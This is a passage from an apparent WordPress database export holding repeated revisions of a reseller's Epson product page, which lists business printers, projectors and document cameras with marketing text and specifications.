projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:44:02','2019-09-26 02:44:02','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3490,1,'2019-09-26 10:44:58','2019-09-26 02:44:58','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></h4>\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>\n<h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" />\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:44:58','2019-09-26 02:44:58','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3492,1,'2019-09-26 10:51:08','2019-09-26 02:51:08','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard 